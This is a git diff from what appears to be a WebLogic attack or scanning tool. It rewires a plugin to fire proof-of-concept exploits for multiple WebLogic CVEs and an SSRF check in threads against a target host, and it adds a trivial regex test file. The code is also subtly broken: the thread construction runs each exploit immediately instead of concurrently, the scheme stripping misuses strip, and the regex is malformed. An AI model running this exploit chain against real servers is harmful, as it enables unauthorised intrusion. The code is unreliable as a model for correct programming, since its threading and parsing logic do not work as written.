print("uudi_ssrf脚本出错") if __name__=="__main__": url = sys.argv[1] diff --git a/plugins/weblogic_special_plugin_.py b/plugins/weblogic_special_plugin_.py index 81dfa86..ab90f0c 100644 --- a/plugins/weblogic_special_plugin_.py +++ b/plugins/weblogic_special_plugin_.py @@ -8,44 +8,62 @@ from plugins.weblogic_poc import CVE_2018_2628 from plugins.weblogic_poc import CVE_2018_2893 from plugins.weblogic_poc import managerURL200 from plugins.weblogic_poc import uddi_ssrf +import threading import socket def weblogic_special_plugin_(arg,config): port=7001 ip=socket.gethostbyname(arg.url.strip("http://").strip("https://")) + threads=[] + threads.append(threading.Thread(CVE_2015_4852.run(ip,port))) + threads.append(threading.Thread(CVE_2016_0638.run(ip,port,0))) + threads.append(threading.Thread(CVE_2016_3510.run(ip,port,0))) + threads.append(threading.Thread(CVE_2017_3248.run(ip,port,0))) + threads.append(threading.Thread(CVE_2017_3506.run(ip,port))) + threads.append(threading.Thread(CVE_2018_2893.run(ip,port,0))) + threads.append(threading.Thread(CVE_2018_2628.run(ip,port,0))) + threads.append(threading.Thread(managerURL200.run(ip,port))) + threads.append(threading.Thread(uddi_ssrf.run(ip,port))) #print(arg.url) - try: - CVE_2015_4852.run(ip,port) + for thread in threads: + thread.start() + for j in threads: + j.join() + + ''' + try: + threads[0].strat() except Exception: print("CVE_2015_4852 脚本出错") try: - CVE_2016_0638.run(ip,port,0) + threads[1].start() except Exception: print("CVE_2016_0638 脚本出错") try: - CVE_2016_3510.run(ip,port,0) + threads[2].start() except Exception: print("CVE_2016_3510 脚本出错") try: - CVE_2017_3248.run(ip,port,0) + threads[3].start() except Exception: print("CVE_2017_3248 脚本出错") try: - CVE_2017_3506.run(ip,port) + threads[4].start() except Exception: print("CVE_2017_3506 脚本出错") try: - CVE_2018_2893.run(ip,port,0) + threads[5].start() except Exception: print("CVE_2018_2893 脚本出错") try: - CVE_2018_2628.run(ip,port,0) + threads[6].start() except Exception: print("CVE_2018_2628 脚本出错") try: - managerURL200.run(ip,port) + threads[7].start() except Exception: print("managerURL200 脚本出错") try: - uddi_ssrf.run(ip,port) + threads[8].start() except Exception: - print("uddi_ssrf 脚本出错") \ No newline at end of file + print("uddi_ssrf 脚本出错") + ''' \ No newline at end of file diff --git a/test.py b/test.py new file mode 100644 index 0000000..de29f57 --- /dev/null +++ b/test.py @@ -0,0 +1,4 @@ +import re +url="https://baidu.comas.as" +if re.match(r"{2}\w.+$", url): + print("aaaaaaa") \ No newline at end of file